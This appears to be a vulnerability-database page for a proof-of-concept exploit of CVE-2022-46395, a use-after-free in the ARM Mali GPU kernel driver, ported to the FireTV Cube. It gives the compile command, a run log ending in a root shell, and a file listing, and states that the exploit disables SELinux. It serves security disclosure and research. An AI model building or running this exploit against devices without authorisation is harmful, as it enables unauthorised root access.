
CVE-2022-46395 PoC — ARM Mali GPU resource management error vulnerability

Source
Associated Vulnerability
Title: ARM Mali GPU resource management error vulnerability (CVE-2022-46395)
Description: An issue was discovered in the Arm Mali GPU Kernel Driver. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Midgard r0p0 through r32p0, Bifrost r0p0 through r41p0 before r42p0, Valhall r19p0 through r41p0 before r42p0, and Avalon r41p0 before r42p0.
Description
CVE-2022-46395 POC for FireTV 2nd gen Cube (raven) 
Readme
## Exploit for CVE-2022-46395 to run on FireTV 2nd gen Cube

This is a fork of security researcher Man Yue Mo's <a href="https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_46395">Pixel 6 POC</a> for CVE-2022-46395. Read his detailed write-up of the vulnerability <a href="https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug/">here</a>. Changes have been made to account for FireOS's 32-bit user space. The POC exploits a use-after-free bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.

The exploit was patched in PS7652/3564 (late August 2023). For reference, the following command was used to compile with clang in ndk-21:
```
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o raven_buf
```
For fastest results, run it immediately after a fresh reboot. On average the POC takes 2-5 min to gain root.
```
raven:/ $ /data/local/tmp/raven_buf
Amazon/raven/raven:9/PS7646.3565N/0028085972224:user/amz-p,release-keys
benchmark_time 138
failed after 100
finished reset: 342278966 fault: 338143633 195 err 0 read 3
failed to find pgd, retry
finished reset: 731402639 fault: 724605931 208 err 0 read 3
failed to find pgd, retry
finished reset: 67309348 fault: 66434848 210 err 0 read 3
failed to find pgd, retry
failed after 200
failed after 300
benchmark_time 135
failed after 400
failed after 500
failed after 600
benchmark_time 131
failed after 700
finish reset: 797174916 fault: 788811083 352 err 0 read 3
found pgd at page 6
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001d0 1d0
overwrite addr : 1043001d0 1d0
result 50
raven:/ #
```
File Snapshot

```
[4.0K] /data/pocs/d711b8b29381c95a31287c9ec4e2265d2acf3253
├── [ 241] log_utils.h
├── [ 50K] mali_base_jm_kernel.h
├── [ 32K] mali.h
├── [ 24K] mali_user_buf.c
├── [2.1K] mempool_utils.c
├── [ 522] mempool_utils.h
├── [6.7K] mem_write.c
├── [1.3K] mem_write.h
├── [ 11K] midgard.h
└── [1.8K] README.md

0 directories, 10 files
```